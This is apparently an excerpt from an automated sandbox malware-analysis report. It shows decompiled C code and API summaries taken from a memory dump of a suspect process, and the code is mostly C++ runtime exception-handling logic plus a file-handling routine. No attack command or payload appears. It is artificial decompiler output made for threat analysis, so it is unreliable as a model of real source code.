                                                0x02faa554
                                                0x02faa556
                                                0x02faa559
                                                0x02faa571
                                                0x02faa578
                                                0x02faa578
                                                0x02faa58c
                                                0x02faa5a6
                                                0x02faa5a8
                                                0x02faa5ae
                                                0x02faa5b6
                                                0x02faa5c5
                                                0x02faa5ca
                                                0x02faa5cc
                                                0x02faa5d4
                                                0x02faa5d4
                                                0x02faa5d6
                                                0x02faa5ce
                                                0x02faa5ce
                                                0x02faa5d0
                                                0x02faa5d2
                                                0x00000000
                                                0x00000000
                                                0x02faa5d2
                                                0x02faa5ce
                                                0x02faa5f7
                                                0x02faa5fc
                                                0x02faa5fe
                                                0x00000000
                                                0x02faa600
                                                0x02faa600
                                                0x00000000
                                                0x02faa602
                                                0x02faa602
                                                0x02faa605
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02faa605
                                                0x02faa600
                                                0x02faa515
                                                0x02faa515
                                                0x02faa529
                                                0x02faa529
                                                0x02faa513
                                                0x02faa4ee

                                                APIs
                                                • wsprintfW.USER32 ref: 02FAA3F6
                                                • wsprintfW.USER32 ref: 02FAA421
                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02FAA442
                                                • CloseHandle.KERNEL32(00000000), ref: 02FAA454
                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000002,00000080,00000000), ref: 02FAA4E7
                                                • GetFileTime.KERNEL32(00000000,00000000,00000000,00000000), ref: 02FAA50A
                                                • CloseHandle.KERNEL32(00000000), ref: 02FAA515
                                                • CloseHandle.KERNEL32(00000000), ref: 02FAA52A
                                                • DeleteFileW.KERNEL32(?), ref: 02FAA533
                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 02FAA552
                                                • GetFileTime.KERNEL32(00000000,00000000,00000000,00000000), ref: 02FAA571
                                                • CloseHandle.KERNEL32(00000000), ref: 02FAA578
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02FAA59B
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02FAA5C5
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02FAA5E1
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02FAA5EC
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02FAA5F7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: File$Unothrow_t@std@@@__ehfuncinfo$??2@$CloseHandle$Create$Timewsprintf$Delete
                                                • String ID: %ws.log$%ws\%ws$Microsoft.ini
                                                • API String ID: 3158408392-397874326
                                                • Opcode ID: b7caf07ea9abdc2a3bcb0d9b1441266fe8b41037fc70db17b858d00e1084d5ec
                                                • Instruction ID: 222fea685ada51034bc9ab1881f3cb41e524a2cf71cbeb293882062f3db88334
                                                • Opcode Fuzzy Hash: b7caf07ea9abdc2a3bcb0d9b1441266fe8b41037fc70db17b858d00e1084d5ec
                                                • Instruction Fuzzy Hash: 365174F1A4021CAAEB20DA64CD95FDEB77CAB44754F500599F708B71C0DAB06A89CF98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FB221C Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 270COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 64%
                                                			E02FB221C(signed int* __ecx, signed int __edx, intOrPtr* _a4, intOrPtr _a8, signed int* _a12, intOrPtr _a16, signed int* _a20, char _a24, intOrPtr _a28, signed int _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				char _v5;
				char _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				char _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				char _v72;
				intOrPtr* _v80;
				signed int _v100;
				signed int* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t190;
				signed int* _t198;
				intOrPtr* _t199;
				signed int _t202;
				signed int _t206;
				intOrPtr* _t210;
				signed int _t211;
				signed int _t212;
				signed int _t214;
				signed int _t215;
				signed int _t217;
				signed int _t221;
				void* _t225;
				signed int _t227;
				void* _t231;
				void* _t233;
				char _t234;
				signed int* _t236;
				signed int _t237;
				signed int _t238;
				signed int _t240;
				signed int _t244;
				void* _t246;
				void* _t248;
				void* _t251;
				intOrPtr _t253;
				intOrPtr _t254;
				void* _t256;
				char _t257;
				signed int _t263;
				char* _t267;
				intOrPtr _t273;
				signed int _t278;
				signed int _t279;
				signed int _t282;
				char _t283;
				intOrPtr _t285;
				signed int _t287;
				signed int* _t289;
				intOrPtr* _t290;
				signed int* _t292;
				signed int _t294;
				intOrPtr _t300;
				intOrPtr* _t304;
				signed int _t305;
				void* _t306;
				signed int* _t310;
				void* _t313;
				void* _t314;
				void* _t316;
				void* _t317;
				void* _t318;
				void* _t319;

				_t282 = __edx;
				_t264 = __ecx;
				_t253 = _a8;
				_push(_t304);
				_t289 = _a20;
				_v44 = 0;
				_v5 = 0;
				if(_t289[1] > 0x80) {
					_t190 =  *((intOrPtr*)(_t253 + 8));
				} else {
					_t190 =  *((char*)(_t253 + 8));
				}
				_v12 = _t190;
				if(_t190 < 0xffffffff || _t190 >= _t289[1]) {
					L62:
					E02FB753C(_t253, _t264, _t289, _t304, __eflags);
					goto L63;
				} else {
					_t304 = _a4;
					if( *_t304 != 0xe06d7363) {
						_t264 = _a12;
						goto L57;
					} else {
						if( *((intOrPtr*)(_t304 + 0x10)) != 3 ||  *((intOrPtr*)(_t304 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930522) {
							L23:
							_t264 = _a12;
							_v16 = _t264;
							goto L25;
						} else {
							_t328 =  *((intOrPtr*)(_t304 + 0x1c));
							if( *((intOrPtr*)(_t304 + 0x1c)) != 0) {
								goto L23;
							} else {
								_t225 = E02FB360E(_t253, _t264, _t282, _t289, _t304, _t328);
								_t329 =  *((intOrPtr*)(_t225 + 0x10));
								if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
									L61:
									return _t225;
								} else {
									_t304 =  *((intOrPtr*)(E02FB360E(_t253, _t264, _t282, _t289, _t304, _t329) + 0x10));
									_t246 = E02FB360E(_t253, _t264, _t282, _t289, _t304, _t329);
									_v44 = 1;
									_v16 =  *((intOrPtr*)(_t246 + 0x14));
									if(_t304 == 0) {
										goto L62;
									} else {
										if( *_t304 != 0xe06d7363 ||  *((intOrPtr*)(_t304 + 0x10)) != 3 ||  *((intOrPtr*)(_t304 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930522) {
											L19:
											_t248 = E02FB360E(_t253, _t264, _t282, _t289, _t304, _t336);
											_t337 =  *((intOrPtr*)(_t248 + 0x1c));
											if( *((intOrPtr*)(_t248 + 0x1c)) == 0) {
												L24:
												_t264 = _v16;
												_t190 = _v12;
												L25:
												__eflags =  *_t304 - 0xe06d7363;
												if( *_t304 != 0xe06d7363) {
													L57:
													__eflags = _t289[3];
													if(__eflags <= 0) {
														goto L60;
													} else {
														__eflags = _a24;
														if(__eflags != 0) {
															goto L62;
														} else {
															_push(_a32);
															_push(_a28);
															_push(_t190);
															_push(_t289);
															_push(_a16);
															_push(_t264);
															_push(_t253);
															_push(_t304);
															L66();
															_t316 = _t316 + 0x20;
															goto L60;
														}
													}
												} else {
													__eflags =  *((intOrPtr*)(_t304 + 0x10)) - 3;
													if( *((intOrPtr*)(_t304 + 0x10)) != 3) {
														goto L57;
													} else {
														__eflags =  *((intOrPtr*)(_t304 + 0x14)) - 0x19930520;
														if( *((intOrPtr*)(_t304 + 0x14)) == 0x19930520) {
															L30:
															__eflags = _t289[3];
															if(_t289[3] > 0) {
																_t264 =  &_v28;
																_t233 = E02FB3879( &_v28, _t289, _a28, _t190,  &_v28,  &_v48);
																_t282 = _v28;
																_t316 = _t316 + 0x14;
																__eflags = _t282 - _v48;
																if(_t282 < _v48) {
																	_t47 = _t233 + 0x10; // 0x10
																	_t278 = _t47;
																	_t234 = _v12;
																	_v36 = _t278;
																	do {
																		_t50 = _t278 - 0x10; // 0x0
																		_v60 = _t50;
																		_t289 = _a20;
																		__eflags =  *((intOrPtr*)(_t278 - 0x10)) - _t234;
																		if( *((intOrPtr*)(_t278 - 0x10)) <= _t234) {
																			__eflags = _t234 -  *((intOrPtr*)(_t278 - 0xc));
																			if(_t234 <=  *((intOrPtr*)(_t278 - 0xc))) {
																				_v24 =  *_t278;
																				_t263 =  *(_t278 - 4);
																				__eflags = _t263;
																				_v32 = _t263;
																				_t253 = _a8;
																				if(_t263 > 0) {
																					_t279 = _v24;
																					_t236 =  *( *((intOrPtr*)(_t304 + 0x1c)) + 0xc);
																					_t287 =  *_t236;
																					_t237 =  &(_t236[1]);
																					__eflags = _t237;
																					_v52 = _t237;
																					_t238 = _v32;
																					_v56 = _t287;
																					while(1) {
																						_v20 = _v52;
																						_t289 = _a20;
																						_v40 = _t287;
																						__eflags = _t287;
																						if(_t287 <= 0) {
																							goto L41;
																						} else {
																							goto L38;
																						}
																						while(1) {
																							L38:
																							_t240 = E02FB2B69(_t279,  *_v20,  *((intOrPtr*)(_t304 + 0x1c)));
																							_t316 = _t316 + 0xc;
																							__eflags = _t240;
																							if(_t240 != 0) {
																								break;
																							}
																							_v20 = _v20 + 4;
																							_t244 = _v40 - 1;
																							_t279 = _v24;
																							_v40 = _t244;
																							__eflags = _t244;
																							if(_t244 > 0) {
																								continue;
																							} else {
																								_t238 = _v32;
																								goto L41;
																							}
																							L44:
																							_t282 = _v28;
																							_t278 = _v36;
																							_t234 = _v12;
																							goto L45;
																						}
																						_push(_v44);
																						_v5 = 1;
																						E02FB2157(_t253, _t287, _t304, _t253, _v16, _a16, _t289, _v24,  *_v20, _v60, _a28, _a32);
																						_t316 = _t316 + 0x2c;
																						goto L44;
																						L41:
																						_t238 = _t238 - 1;
																						_t279 = _t279 + 0x10;
																						_v32 = _t238;
																						_v24 = _t279;
																						__eflags = _t238;
																						if(_t238 > 0) {
																							_t287 = _v56;
																							_v20 = _v52;
																							_t289 = _a20;
																							_v40 = _t287;
																							__eflags = _t287;
																							if(_t287 <= 0) {
																								goto L41;
																							} else {
																								goto L38;
																							}
																						}
																						goto L44;
																					}
																				}
																			}
																		}
																		L45:
																		_t282 = _t282 + 1;
																		_t278 = _t278 + 0x14;
																		_v28 = _t282;
																		_v36 = _t278;
																		__eflags = _t282 - _v48;
																	} while (_t282 < _v48);
																}
															}
															__eflags = _a24;
															if(__eflags != 0) {
																_push(1);
																E02FB1E94(__eflags);
																_t264 = _t304;
															}
															__eflags = _v5;
															if(__eflags != 0) {
																L60:
																_t225 = E02FB360E(_t253, _t264, _t282, _t289, _t304, __eflags);
																__eflags =  *(_t225 + 0x1c);
																if(__eflags != 0) {
																	goto L62;
																} else {
																	goto L61;
																}
															} else {
																_t227 =  *_t289 & 0x1fffffff;
																__eflags = _t227 - 0x19930521;
																if(__eflags < 0) {
																	goto L60;
																} else {
																	__eflags = _t289[7];
																	if(_t289[7] != 0) {
																		L52:
																		__eflags = _t289[8] & 0x00000004;
																		if(__eflags != 0) {
																			goto L62;
																		} else {
																			_push(_t289[7]);
																			L86();
																			_t264 = _t304;
																			__eflags = _t227;
																			if(__eflags != 0) {
																				goto L60;
																			} else {
																				E02FB360E(_t253, _t264, _t282, _t289, _t304, __eflags);
																				E02FB360E(_t253, _t264, _t282, _t289, _t304, __eflags);
																				 *((intOrPtr*)(E02FB360E(_t253, _t264, _t282, _t289, _t304, __eflags) + 0x10)) = _t304;
																				_t231 = E02FB360E(_t253, _t264, _t282, _t289, _t304, __eflags);
																				__eflags = _a32;
																				_t267 = _v16;
																				_push(_t304);
																				 *((intOrPtr*)(_t231 + 0x14)) = _t267;
																				if(_a32 != 0) {
																					goto L64;
																				} else {
																					_push(_t253);
																				}
																				goto L65;
																			}
																		}
																	} else {
																		__eflags = _t289[8] & 0x00000004;
																		if(__eflags == 0) {
																			goto L60;
																		} else {
																			goto L52;
																		}
																	}
																}
															}
														} else {
															__eflags =  *((intOrPtr*)(_t304 + 0x14)) - 0x19930521;
															if( *((intOrPtr*)(_t304 + 0x14)) == 0x19930521) {
																goto L30;
															} else {
																__eflags =  *((intOrPtr*)(_t304 + 0x14)) - 0x19930522;
																if( *((intOrPtr*)(_t304 + 0x14)) != 0x19930522) {
																	goto L57;
																} else {
																	goto L30;
																}
															}
														}
													}
												}
											} else {
												_v36 =  *((intOrPtr*)(E02FB360E(_t253, _t264, _t282, _t289, _t304, _t337) + 0x1c));
												_t251 = E02FB360E(_t253, _t264, _t282, _t289, _t304, _t337);
												_push(_v36);
												_push(_t304);
												 *(_t251 + 0x1c) =  *(_t251 + 0x1c) & 0x00000000;
												L86();
												if(_t251 != 0) {
													goto L24;
												} else {
													_push(_v36);
													L99();
													_pop(_t264);
													_t339 = _t251;
													if(_t251 == 0) {
														goto L62;
													} else {
													}
													L63:
													_push(1);
													_push(_t304);
													E02FB1E94(_t339);
													_t267 =  &_v72;
													E02FB1F49(_t267);
													E02FB33CD( &_v72, 0x2fcde1c);
													L64:
													_push(_a32);
													L65:
													E02FB3923(_t267);
													_push(_a16);
													_push(_t253);
													E02FB29A5(_t253, _t267, _t282, _t289, _t339);
													_t317 = _t316 + 0x10;
													_push(_t289[7]);
													_t198 = E02FB211D(_t253, _t267, _t282, _t289, _t304, _t339);
													asm("int3");
													_t313 = _t317;
													_push(_t267);
													_push(_t267);
													_push(_t289);
													_t290 = _v80;
													_t340 =  *_t290 - 0x80000003;
													if( *_t290 == 0x80000003) {
														L84:
														return _t198;
													} else {
														_push(_t253);
														_t199 = E02FB360E(_t253, _t267, _t282, _t290, _t304, _t340, _t304);
														_t254 = _a16;
														_t341 =  *((intOrPtr*)(_t199 + 8));
														if( *((intOrPtr*)(_t199 + 8)) == 0) {
															L72:
															if( *((intOrPtr*)(_t254 + 0xc)) == 0) {
																E02FB753C(_t254, _t267, _t290, _t304, __eflags);
																asm("int3");
																_push(_t313);
																_t314 = _t317;
																_t318 = _t317 - 0x18;
																_push(_t254);
																_push(_t304);
																_t305 = _v100;
																_push(_t290);
																__eflags = _t305;
																if(__eflags == 0) {
																	E02FB753C(_t254, _t267, _t290, _t305, __eflags);
																	asm("int3");
																	_push(_t314);
																	_push(_t254);
																	_push(_t305);
																	_push(_t290);
																	_t292 = _v144;
																	_t306 = 0;
																	__eflags =  *_t292;
																	if( *_t292 <= 0) {
																		L103:
																		_t202 = 0;
																		__eflags = 0;
																	} else {
																		_t256 = 0;
																		while(1) {
																			_t206 = E02FB359A( *((intOrPtr*)(_t256 + _t292[1] + 4)) + 4, 0x2fd5d4c);
																			__eflags = _t206;
																			if(_t206 == 0) {
																				break;
																			}
																			_t306 = _t306 + 1;
																			_t256 = _t256 + 0x10;
																			__eflags = _t306 -  *_t292;
																			if(_t306 <  *_t292) {
																				continue;
																			} else {
																				goto L103;
																			}
																			goto L104;
																		}
																		_t202 = 1;
																	}
																	L104:
																	return _t202;
																} else {
																	_t294 =  *_t305;
																	_t257 = 0;
																	__eflags = _t294;
																	if(_t294 > 0) {
																		_t283 = 0;
																		_v16 = 0;
																		_t210 =  *((intOrPtr*)( *((intOrPtr*)(_v4 + 0x1c)) + 0xc));
																		_t211 = _t210 + 4;
																		__eflags = _t211;
																		_v28 =  *_t210;
																		_v36 = _t211;
																		do {
																			_t271 = _t211;
																			_t212 = _v28;
																			_v24 = _t211;
																			_v20 = _t212;
																			__eflags = _t212;
																			if(_t212 > 0) {
																				_t214 =  *((intOrPtr*)(_t305 + 4)) + _t283;
																				__eflags = _t214;
																				_v32 = _t214;
																				while(1) {
																					_t215 = E02FB2B69(_t214,  *_t271,  *((intOrPtr*)(_v4 + 0x1c)));
																					_t318 = _t318 + 0xc;
																					__eflags = _t215;
																					if(_t215 != 0) {
																						break;
																					}
																					_t217 = _v20 - 1;
																					_t271 = _v24 + 4;
																					_v20 = _t217;
																					__eflags = _t217;
																					_v24 = _v24 + 4;
																					_t214 = _v32;
																					if(_t217 > 0) {
																						continue;
																					} else {
																					}
																					L95:
																					_t283 = _v16;
																					goto L96;
																				}
																				_t257 = 1;
																				goto L95;
																			}
																			L96:
																			_t211 = _v36;
																			_t283 = _t283 + 0x10;
																			_v16 = _t283;
																			_t294 = _t294 - 1;
																			__eflags = _t294;
																		} while (_t294 != 0);
																	}
																	return _t257;
																}
															} else {
																_t198 = E02FB3879(_t267, _t254, _a24, _a20,  &_v16,  &_v12);
																_t273 = _v16;
																_t319 = _t317 + 0x14;
																_t285 = _v12;
																if(_t273 < _t285) {
																	_t137 =  &(_t198[3]); // 0xc
																	_t310 = _t137;
																	_t198 = _a20;
																	do {
																		if(_t198 >=  *((intOrPtr*)(_t310 - 0xc)) && _t198 <=  *((intOrPtr*)(_t310 - 8))) {
																			_t221 =  *_t310 << 4;
																			if( *((intOrPtr*)(_t310[1] + _t221 - 0xc)) == 0) {
																				L79:
																				_t222 = _t221 + _t310[1] + 0xfffffff0;
																				_t300 = _v0;
																				if(( *(_t221 + _t310[1] + 0xfffffff0) & 0x00000040) == 0) {
																					_push(1);
																					_t155 = _t310 - 0xc; // 0x0
																					E02FB2157(_t254, _t285, _t300, _a4, _a8, _a12, _t254, _t222, 0, _t155, _a24, _a28);
																					_t285 = _v12;
																					_t319 = _t319 + 0x2c;
																					_t273 = _v16;
																				}
																			} else {
																				_t285 = _v12;
																				_t254 = _a16;
																				if( *((char*)( *((intOrPtr*)(_t310[1] + _t221 - 0xc)) + 8)) == 0) {
																					goto L79;
																				}
																			}
																			_t198 = _a20;
																		}
																		_t273 = _t273 + 1;
																		_t310 =  &(_t310[5]);
																		_v16 = _t273;
																	} while (_t273 < _t285);
																}
																goto L83;
															}
														} else {
															__imp__EncodePointer();
															_t304 = _t199;
															if( *((intOrPtr*)(E02FB360E(_t254, _t267, _t282, _t290, _t304, _t341, 0) + 8)) == _t304 ||  *_t290 == 0xe0434f4d ||  *_t290 == 0xe0434352) {
																goto L72;
															} else {
																_t198 = E02FB379C(_t290, _a4, _a8, _a12, _t254, _a24, _a28);
																_t317 = _t317 + 0x1c;
																if(_t198 != 0) {
																	L83:
																	goto L84;
																} else {
																	goto L72;
																}
															}
														}
													}
												}
											}
										} else {
											_t336 =  *((intOrPtr*)(_t304 + 0x1c));
											if( *((intOrPtr*)(_t304 + 0x1c)) == 0) {
												goto L62;
											} else {
												goto L19;
											}
										}
									}
								}
							}
						}
					}
				}
			}
















































































                                                0x02fb221c
                                                0x02fb221c
                                                0x02fb2223
                                                0x02fb2226
                                                0x02fb2228
                                                0x02fb222b
                                                0x02fb222f
                                                0x02fb223a
                                                0x02fb2242
                                                0x02fb223c
                                                0x02fb223c
                                                0x02fb223c
                                                0x02fb2245
                                                0x02fb224b
                                                0x02fb2535
                                                0x02fb2535
                                                0x00000000
                                                0x02fb225a
                                                0x02fb225a
                                                0x02fb2263
                                                0x02fb24fe
                                                0x00000000
                                                0x02fb2269
                                                0x02fb226d
                                                0x02fb2341
                                                0x02fb2341
                                                0x02fb2344
                                                0x00000000
                                                0x02fb2292
                                                0x02fb2292
                                                0x02fb2296
                                                0x00000000
                                                0x02fb229c
                                                0x02fb229c
                                                0x02fb22a1
                                                0x02fb22a5
                                                0x02fb252e
                                                0x02fb2534
                                                0x02fb22ab
                                                0x02fb22b0
                                                0x02fb22b3
                                                0x02fb22b8
                                                0x02fb22bf
                                                0x02fb22c4
                                                0x00000000
                                                0x02fb22ca
                                                0x02fb22d0
                                                0x02fb22fd
                                                0x02fb22fd
                                                0x02fb2302
                                                0x02fb2306
                                                0x02fb2349
                                                0x02fb2349
                                                0x02fb234c
                                                0x02fb234f
                                                0x02fb234f
                                                0x02fb2355
                                                0x02fb2501
                                                0x02fb2501
                                                0x02fb2505
                                                0x00000000
                                                0x02fb2507
                                                0x02fb2507
                                                0x02fb250b
                                                0x00000000
                                                0x02fb250d
                                                0x02fb250d
                                                0x02fb2510
                                                0x02fb2513
                                                0x02fb2514
                                                0x02fb2515
                                                0x02fb2518
                                                0x02fb2519
                                                0x02fb251a
                                                0x02fb251b
                                                0x02fb2520
                                                0x00000000
                                                0x02fb2520
                                                0x02fb250b
                                                0x02fb235b
                                                0x02fb235b
                                                0x02fb235f
                                                0x00000000
                                                0x02fb2365
                                                0x02fb2365
                                                0x02fb236c
                                                0x02fb2384
                                                0x02fb2384
                                                0x02fb2388
                                                0x02fb2392
                                                0x02fb239b
                                                0x02fb23a0
                                                0x02fb23a3
                                                0x02fb23a6
                                                0x02fb23a9
                                                0x02fb23af
                                                0x02fb23af
                                                0x02fb23b2
                                                0x02fb23b5
                                                0x02fb23b8
                                                0x02fb23b8
                                                0x02fb23bb
                                                0x02fb23be
                                                0x02fb23c1
                                                0x02fb23c4
                                                0x02fb23ca
                                                0x02fb23cd
                                                0x02fb23d5
                                                0x02fb23d8
                                                0x02fb23db
                                                0x02fb23dd
                                                0x02fb23e0
                                                0x02fb23e3
                                                0x02fb23ec
                                                0x02fb23ef
                                                0x02fb23f2
                                                0x02fb23f4
                                                0x02fb23f4
                                                0x02fb23f7
                                                0x02fb23fa
                                                0x02fb23fd
                                                0x02fb2400
                                                0x02fb2403
                                                0x02fb2406
                                                0x02fb2409
                                                0x02fb240c
                                                0x02fb240e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fb2410
                                                0x02fb2410
                                                0x02fb2419
                                                0x02fb241e
                                                0x02fb2421
                                                0x02fb2423
                                                0x00000000
                                                0x00000000
                                                0x02fb2428
                                                0x02fb242c
                                                0x02fb242d
                                                0x02fb2430
                                                0x02fb2433
                                                0x02fb2435
                                                0x00000000
                                                0x02fb2437
                                                0x02fb2437
                                                0x00000000
                                                0x02fb2437
                                                0x02fb2476
                                                0x02fb2476
                                                0x02fb2479
                                                0x02fb247c
                                                0x00000000
                                                0x02fb247c
                                                0x02fb244d
                                                0x02fb2456
                                                0x02fb246e
                                                0x02fb2473
                                                0x00000000
                                                0x02fb243a
                                                0x02fb243a
                                                0x02fb243b
                                                0x02fb243e
                                                0x02fb2441
                                                0x02fb2444
                                                0x02fb2446
                                                0x02fb2448
                                                0x02fb2403
                                                0x02fb2406
                                                0x02fb2409
                                                0x02fb240c
                                                0x02fb240e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fb240e
                                                0x00000000
                                                0x02fb2446
                                                0x02fb2400
                                                0x02fb23e3
                                                0x02fb23cd
                                                0x02fb247f
                                                0x02fb247f
                                                0x02fb2480
                                                0x02fb2483
                                                0x02fb2486
                                                0x02fb2489
                                                0x02fb2489
                                                0x02fb23b8
                                                0x02fb23a9
                                                0x02fb2492
                                                0x02fb2496
                                                0x02fb2498
                                                0x02fb249b
                                                0x02fb24a1
                                                0x02fb24a1
                                                0x02fb24a2
                                                0x02fb24a6
                                                0x02fb2523
                                                0x02fb2523
                                                0x02fb2528
                                                0x02fb252c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fb24a8
                                                0x02fb24aa
                                                0x02fb24af
                                                0x02fb24b4
                                                0x00000000
                                                0x02fb24b6
                                                0x02fb24b6
                                                0x02fb24ba
                                                0x02fb24c2
                                                0x02fb24c2
                                                0x02fb24c6
                                                0x00000000
                                                0x02fb24c8
                                                0x02fb24c8
                                                0x02fb24cc
                                                0x02fb24d2
                                                0x02fb24d3
                                                0x02fb24d5
                                                0x00000000
                                                0x02fb24d7
                                                0x02fb24d7
                                                0x02fb24dc
                                                0x02fb24e6
                                                0x02fb24e9
                                                0x02fb24ee
                                                0x02fb24f2
                                                0x02fb24f5
                                                0x02fb24f6
                                                0x02fb24f9
                                                0x00000000
                                                0x02fb24fb
                                                0x02fb24fb
                                                0x02fb24fb
                                                0x00000000
                                                0x02fb24f9
                                                0x02fb24d5
                                                0x02fb24bc
                                                0x02fb24bc
                                                0x02fb24c0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fb24c0
                                                0x02fb24ba
                                                0x02fb24b4
                                                0x02fb236e
                                                0x02fb236e
                                                0x02fb2375
                                                0x00000000
                                                0x02fb2377
                                                0x02fb2377
                                                0x02fb237e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fb237e
                                                0x02fb2375
                                                0x02fb236c
                                                0x02fb235f
                                                0x02fb2308
                                                0x02fb2310
                                                0x02fb2313
                                                0x02fb2318
                                                0x02fb231b
                                                0x02fb231c
                                                0x02fb2320
                                                0x02fb2329
                                                0x00000000
                                                0x02fb232b
                                                0x02fb232b
                                                0x02fb232e
                                                0x02fb2333
                                                0x02fb2334
                                                0x02fb2336
                                                0x00000000
                                                0x00000000
                                                0x02fb233c
                                                0x02fb253a
                                                0x02fb253a
                                                0x02fb253c
                                                0x02fb253d
                                                0x02fb2544
                                                0x02fb2547
                                                0x02fb2555
                                                0x02fb255a
                                                0x02fb255a
                                                0x02fb255d
                                                0x02fb255d
                                                0x02fb2565
                                                0x02fb2568
                                                0x02fb2569
                                                0x02fb256e
                                                0x02fb2571
                                                0x02fb2574
                                                0x02fb2579
                                                0x02fb257b
                                                0x02fb257d
                                                0x02fb257e
                                                0x02fb257f
                                                0x02fb2580
                                                0x02fb2583
                                                0x02fb2589
                                                0x02fb268a
                                                0x02fb268e
                                                0x02fb258f
                                                0x02fb258f
                                                0x02fb2591
                                                0x02fb2596
                                                0x02fb2599
                                                0x02fb259d
                                                0x02fb25e4
                                                0x02fb25e8
                                                0x02fb268f
                                                0x02fb2694
                                                0x02fb2695
                                                0x02fb2696
                                                0x02fb2698
                                                0x02fb269b
                                                0x02fb269c
                                                0x02fb269d
                                                0x02fb26a0
                                                0x02fb26a1
                                                0x02fb26a3
                                                0x02fb272b
                                                0x02fb2730
                                                0x02fb2731
                                                0x02fb2734
                                                0x02fb2735
                                                0x02fb2736
                                                0x02fb2737
                                                0x02fb273a
                                                0x02fb273c
                                                0x02fb273e
                                                0x02fb2765
                                                0x02fb2765
                                                0x02fb2765
                                                0x02fb2740
                                                0x02fb2740
                                                0x02fb2742
                                                0x02fb2752
                                                0x02fb2759
                                                0x02fb275b
                                                0x00000000
                                                0x00000000
                                                0x02fb275d
                                                0x02fb275e
                                                0x02fb2761
                                                0x02fb2763
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fb2763
                                                0x02fb276c
                                                0x02fb276c
                                                0x02fb2767
                                                0x02fb276b
                                                0x02fb26a9
                                                0x02fb26a9
                                                0x02fb26ab
                                                0x02fb26ad
                                                0x02fb26af
                                                0x02fb26b4
                                                0x02fb26b6
                                                0x02fb26bc
                                                0x02fb26c1
                                                0x02fb26c1
                                                0x02fb26c4
                                                0x02fb26c7
                                                0x02fb26ca
                                                0x02fb26ca
                                                0x02fb26cc
                                                0x02fb26cf
                                                0x02fb26d2
                                                0x02fb26d5
                                                0x02fb26d7
                                                0x02fb26dc
                                                0x02fb26dc
                                                0x02fb26de
                                                0x02fb26e1
                                                0x02fb26ea
                                                0x02fb26ef
                                                0x02fb26f2
                                                0x02fb26f4
                                                0x00000000
                                                0x00000000
                                                0x02fb26fc
                                                0x02fb26fd
                                                0x02fb2700
                                                0x02fb2703
                                                0x02fb2705
                                                0x02fb2708
                                                0x02fb270b
                                                0x00000000
                                                0x00000000
                                                0x02fb270d
                                                0x02fb2711
                                                0x02fb2711
                                                0x00000000
                                                0x02fb2711
                                                0x02fb270f
                                                0x00000000
                                                0x02fb270f
                                                0x02fb2714
                                                0x02fb2714
                                                0x02fb2717
                                                0x02fb271a
                                                0x02fb271d
                                                0x02fb271d
                                                0x02fb271d
                                                0x02fb26ca
                                                0x02fb272a
                                                0x02fb272a
                                                0x02fb25ee
                                                0x02fb25fd
                                                0x02fb2602
                                                0x02fb2605
                                                0x02fb2608
                                                0x02fb260d
                                                0x02fb260f
                                                0x02fb260f
                                                0x02fb2612
                                                0x02fb2615
                                                0x02fb2618
                                                0x02fb2624
                                                0x02fb262d
                                                0x02fb2642
                                                0x02fb2648
                                                0x02fb264a
                                                0x02fb2650
                                                0x02fb2652
                                                0x02fb2657
                                                0x02fb266c
                                                0x02fb2671
                                                0x02fb2674
                                                0x02fb2677
                                                0x02fb2677
                                                0x02fb262f
                                                0x02fb2636
                                                0x02fb263d
                                                0x02fb2640
                                                0x00000000
                                                0x00000000
                                                0x02fb2640
                                                0x02fb267a
                                                0x02fb267a
                                                0x02fb267d
                                                0x02fb267e
                                                0x02fb2681
                                                0x02fb2684
                                                0x02fb2615
                                                0x00000000
                                                0x02fb260d
                                                0x02fb259f
                                                0x02fb25a1
                                                0x02fb25a7
                                                0x02fb25b1
                                                0x00000000
                                                0x02fb25c3
                                                0x02fb25d4
                                                0x02fb25d9
                                                0x02fb25de
                                                0x02fb2688
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fb25de
                                                0x02fb25b1
                                                0x02fb259d
                                                0x02fb2589
                                                0x02fb2329
                                                0x02fb22f3
                                                0x02fb22f3
                                                0x02fb22f7
                                                0x00000000
                                                0x00000000
